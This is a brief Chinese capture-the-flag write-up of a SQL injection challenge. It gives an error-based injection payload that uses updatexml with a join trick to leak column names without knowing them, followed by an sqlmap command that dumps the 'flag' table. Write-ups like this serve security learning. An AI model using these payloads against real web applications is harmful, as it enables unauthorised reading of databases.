印象里是sqlmap直接跑,可以跑出来一个flag表,但是只能跑出来一个id字段,使用无列名注入得到其他列名,再报错注入查表完事。
    payload:

    1. admin') and updatexml(0,concat(0x7e,mid((select * from(select * from flag a join (select * from flag)b using(id,no))c),1,50)),0);#

    得到列名后再去sqlmap查询:

    1. sqlmap -r sql1.txt -D security -T flag -C "4719c5f3-13d7-49c8-923a-55e270da4b73" --dump

    有队伍说爆到了别人的flag,很神秘(
    **